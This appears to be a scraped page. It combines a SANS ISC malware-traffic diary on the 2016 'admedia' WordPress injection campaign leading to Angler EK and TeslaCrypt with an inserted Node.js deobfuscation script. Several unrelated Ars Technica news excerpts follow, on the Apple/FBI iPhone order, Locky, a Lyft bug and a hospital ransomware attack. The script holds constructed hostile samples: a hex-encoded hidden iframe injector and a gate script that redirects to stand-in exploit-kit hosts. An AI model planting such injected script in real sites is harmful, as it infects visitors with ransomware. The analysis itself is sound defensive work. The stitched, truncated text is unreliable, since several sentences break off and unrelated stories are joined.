(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.


On 2016-02-01, the Sucuri blog reported a spike in compromised WordPress sites generating hidden iframes with malicious URLs [1]. By 2016-02-02, I started seeing exploit kit (EK) traffic related to this campaign [2]. Sucuri noted that "admedia" was a common string used in malicious URLs generated by these iframes. Because of that, some people (including me) use the term admedia when referring to traffic generated by this campaign. These admedia URLs act as a gate between the compromised website and the EK server. EK traffic associated with this campaign has generally sent TeslaCrypt ransomware. However, characteristics of this campaign have evolved since Sucuri's original blog post.

  • Since 2016-02-11, I've usually seen the term "megaadvertize" used in these gate URLs instead of "admedia" [3, 4, 5].
  • Although we first saw Nuclear EK from this campaign, during the past week or so, these admedia gates have led to Angler EK.
  • In the past 24 hours, I saw a Joomla site generate an admedia gate, so this campaign is no longer limited to WordPress sites.

Other sites like the Malwarebytes blog have also documented this campaign [6]. Sites like Malwarebytes and DeepEnd Research have also documented most of these recent changes [7, 8]. Let's look at a recent Angler EK infection related to this admedia campaign. In today
Shown above: HTML from the compromised site that kicked off this chain of events.

Today's infection

On Wednesday 2016-02-17 at approximately 18:14 UTC, I got a full chain of events. The chain started with a compromised website that generated an admedia gate. The gate led to Angler EK.
Shown above: The infected Windows desktop after Angler EK delivered TeslaCrypt.

How did the compromised website generate the admedia gate? It was caused by injected script. As the Sucuri blog already reported, each .js file returned by the compromised site had malicious script appended to it. However, today
Shown above: Example of malicious script appended to .js files sent by the compromised web server (3 of 3).

f injected script has a long string of hexadecimal code. Translate that string from hex to ASCII, and you
Shown above: The ASCII translation of that long hex string. The admedia gate is highlighted in yellow.

In the traffic, an HTTP GET request to the admedia gate is followed by an HTTP POST. The HTTP POST returns more obfuscated script. That script generates a URL for an Angler EK landing page. How can we check this? Notice the eval
Shown above: HTML and JavaScript returned by the admedia gate.

Take that HTML text and put it in a text editor. Change the eval to alert
Shown above: Changing the eval to alert
Shown above: The Angler EK landing page URL in a pop-up alert.
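The two manual steps above (translating the long hex string in the injected .js to expose the gate URL, then swapping eval for something that only displays the generated landing-page URL) are easy to script for repeatable triage. The Node.js code below is an added example, not code from this diary or from any of the sites it references. The injected script, the gate response and the .example domains in it are constructed sample data, and the decodeHexStrings, captureEval and analyzeChain names are my own. It goes slightly beyond the single case in the diary: it scans a whole file for any hex run of 40 or more characters and discards decodes that are not printable text, so hashes and GUIDs do not show up as hits.

```javascript
// Added example, not code from the ISC diary. Scripts the two manual steps the diary
// walks through: decode the long hex string in injected .js to find the gate URL, then
// run the gate's returned script with eval() swapped for a capture function (the
// "change eval to alert" trick) to recover the EK landing-page URL without ever
// letting the eval'd string execute. Requires Node.js (uses Buffer).

// Strings the diary reports in gate URLs; everything else below is constructed sample data.
const GATE_MARKERS = ['admedia', 'megaadvertize'];

// Constructed stand-in for a .js file served by a compromised site: library code with a
// hex-encoded iframe appended, decoded at runtime and written into the page.
const gateHtml = '<iframe src="http://gate.example/admedia/?id=1" width="1" height="1"></iframe>';
const hexOf = (s) => Buffer.from(s, 'latin1').toString('hex');
const INJECTED_JS =
  'function legit(){return 1;} /* original library content */\n' +
  `var _0xa1="${hexOf(gateHtml)}";` +
  'function d(h){var o="";for(var i=0;i<h.length;i+=2)o+=String.fromCharCode(parseInt(h.substr(i,2),16));return o;}' +
  'document.write(d(_0xa1));';

// Constructed stand-in for the obfuscated script the gate returns to the HTTP POST.
const GATE_RESPONSE_JS =
  'var p=["http://","landing.example","/forum/","index.php?x=","7d3"];' +
  'var u=p.join("");' +
  "eval(\"window.location.href='\" + u + \"'\");";

const URL_RE = /https?:\/\/[^\s"'<>]+/g;
const extractUrls = (text) => text.match(URL_RE) || [];
const isGateLike = (url) => GATE_MARKERS.some((m) => url.toLowerCase().includes(m));

// Step 1: find every hex run of at least minLen characters, decode it, and keep only
// decodes that are printable text. A SHA-256 or GUID is also a long hex run but decodes
// to binary junk, so this filter keeps those from showing up as hits.
function decodeHexStrings(js, minLen = 40) {
  const hexRunRe = new RegExp('[0-9a-fA-F]{' + minLen + ',}', 'g');
  const hits = [];
  for (const run of js.match(hexRunRe) || []) {
    if (run.length % 2 !== 0) continue;              // not a whole number of bytes
    const text = Buffer.from(run, 'hex').toString('latin1');
    if (!/^[\x20-\x7e\r\n\t]+$/.test(text)) continue; // binary, not encoded script/HTML
    const urls = extractUrls(text);
    hits.push({ hexPrefix: run.slice(0, 16) + '...', text, urls, gateUrls: urls.filter(isGateLike) });
  }
  return hits;
}

// Step 2: replace eval( with a capture function (the diary does this by hand with alert)
// and run the rewritten script. The string meant for eval is recorded, never executed.
// The surrounding script does still run, so do this in a throwaway VM for real samples.
function captureEval(js) {
  const captured = [];
  const rewritten = js.replace(/\beval\s*\(/g, '__capture(');
  const capture = (s) => { captured.push(String(s)); };
  new Function('__capture', 'window', 'document', rewritten)(capture, {}, {});
  return captured;
}

// Chain both steps over the constructed samples, as an analyst would over a real capture.
function analyzeChain(injectedJs = INJECTED_JS, gateResponseJs = GATE_RESPONSE_JS) {
  const gateUrls = decodeHexStrings(injectedJs).flatMap((h) => h.gateUrls);
  const landingUrls = captureEval(gateResponseJs).flatMap(extractUrls);
  return { gateUrls, landingUrls };
}

console.log(JSON.stringify(analyzeChain(), null, 2));
```

Run it with node and it prints the gate URL recovered from the hex string and the landing URL that the gate's script would have handed to eval. The regex only rewrites a literal eval( call; a sample that reaches eval through window["eval"] or builds code with Function(...) needs the same substitution applied to those forms, and because the outer script is executed, real captures belong in an isolated VM rather than on an analyst's workstation.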

images of the Angler EK traffic from today
Shown above: HTTP request for the Angler EK malware payload.

Final words

So far, I've only seen TeslaCrypt from this admedia campaign. In fact, I've seen a whole lot of TeslaCrypt lately, with little other ransomware from EK traffic. For example, I last saw CryptoWall on 2016-02-05 [9]. Since then, I haven't noticed any CryptoWall.

However, my field of view is currently limited, and there's plenty of information on other types of ransomware that's been making the rounds lately [10, 11, and 12 to name a few].

Have you seen any admedia Angler EK or similar activity? If so let us know in the comments section below.

Traffic and malware for this ISC diary can be found here.

Brad Duncan
Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic


[1] https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html
[2] http://malware-traffic-analysis.net/2016/02/03/index.html
[3] http://malware-traffic-analysis.net/2016/02/11/index.html
[4] http://malware-traffic-analysis.net/2016/02/12/index2.html
[5] http://malware-traffic-analysis.net/2016/02/15/index.html
[6] https://blog.malwarebytes.org/exploits-2/2016/02/nuclear-ek-leveraged-in-large-wordpress-compromise-campaign/
[7] https://blog.malwarebytes.org/exploits-2/2016/02/wordpress-compromise-campaign-from-nuclear-ek-to-angler-ek/
[8] http://www.deependresearch.org/2016/02/jan-feb-2016-domains-associated-with.html
[9] http://www.malware-traffic-analysis.net/2016/02/05/index.html
[10] https://nakedsecurity.sophos.com/2016/02/17/locky-ransomware-what-you-need-to-know/
[11] https://www.grahamcluley.com/2016/02/padcrypt-ransomware-live-chat/
[12] http://www.bleepingcomputer.com/news/security/umbrecrypt-ransomware-manually-installed-via-terminal-services/


(credit: John Karakatsanis)

Tuesday's court order compelling Apple to hack the iPhone belonging to a gunman who killed 14 people and injured 22 others has ignited an acrimonious debate. CEO Tim Cook called the order "chilling" because, he said, it requires company engineers to create the equivalent of a backdoor that could be used against any iPhone. Law enforcement officials, meanwhile, contend the order is narrowly tailored to ensure only the shooter's phone is covered.

Here's why the totality of what we know right now leans in favor of Cook and his slippery slope argument.

The order requires Apple to create a customized version of iOS that will run only on the iPhone 5C belonging to Syed Rizwan Farook. Along with his wife, Tashfeen Malik, Farook went on a deadly shooting rampage in San Bernadino. The FBI understandably wants access to the data stored on Farook's phone so investigators have a better idea of the events leading up to the deadly attack and whether the husband-and-wife team received support from unknown people. But so far investigators have been unable to unlock the device. Security measures Apple built into the iPhone limit the number of guesses they can make, and there's also concern too many guesses could cause the phone to automatically destroy the data it stores.



(credit: Lawrence Abrams, BleepingComputer)

Several security researchers have discovered a new type of malware that jumps onto the ransomware bandwagon, encrypting victims' files and then demanding a payment of half a bitcoin for the key. Named "Locky," the malware depends on a rather low-tech installation method to take root in a user's system: it arrives courtesy of a malicious macro in a Word document.

Security researchers Kevin Beaumont and Lawrence Abrams each wrote an analysis of Locky on Tuesday, detailing how it installs itself and its components. The carrier document arrives in an e-mail that claims to be delivering an invoice (with a subject line that includes an apparently random invoice number starting with the letter J). When the document is opened, if Office macros are turned on in Word, then the malware installation begins. If not, the victim sees blocks of garbled text in the Word document below the text, "Enable macro if the data encoding is incorrect"—and then infects the system if the user follows that instruction.

Somehow, this malware has already infected hundreds of computers in Europe, Russia, the US, Pakistan, and Mali. The malicious script downloads Locky's malware executable file from a Web server and stores it in the "Temp" folder associated with the active user account. Once installed, it starts scanning for attached drives (including networked drives) and encrypts document, music, video, image, archive, database, and Web application-related files. Networked drives don't need to be actively mapped to be found, however.



(credit: Getty Images)

A bizarre security flaw involving recycled phone numbers is allowing some users of the taxi-hailing app Lyft to access other riders’ accounts, exposing names, e-mail addresses, complete ride histories, and credit card information.

The bug was brought to Ars’ attention by a Lyft user named Felix, who says he signed up for the service for the first time earlier this month. He went through the normal registration process, entering his name, e-mail, credit card, and a new phone number, which was recently assigned to him by T-Mobile.

But Felix realized something was wrong when drivers kept addressing him by someone else’s name—a woman’s name he didn’t recognize. At first, he brushed it off. “I was like, uhh no, it’s Felix. But whatever, you’re here,” he told Ars, recalling some confused moments during his first week using the ridesharing service.



Hollywood Presbyterian Medical Center has shut down much of its network for the past week because of ransomware, causing the diversion of some emergency patients to other hospitals, according to sources at the hospital. (credit: Junkyardsparkle)

Hollywood Presbyterian Medical Center, a hospital in Los Angeles, is the victim of what officials describe as an ongoing cyberattack. A hospital spokesperson told Ars in a prepared statement that "patient care has not been affected" by the intrusion. And an executive of the hospital told reporters that the attack was "random" and not targeted at patient records.

However, local news organizations have reported that some emergency patients were diverted to other hospitals—and that some of the hospital's systems have been locked down by ransomware. The hospital has reverted to paper patient registration and medical records, according to NBC 4 in Los Angeles, and the hospital's network has been shut down for over a week.

A spokesperson for the Federal Bureau of Investigation's Los Angeles office confirmed to Ars that HPMC had been targeted in a cyberattack, but he declined to comment further as an investigation is ongoing. The amount being demanded by the attackers to provide the key to unlock the hospital's systems has not been made public, though it has been reported to be as much as 9,000 Bitcoin—the equivalent of $3.6 million.

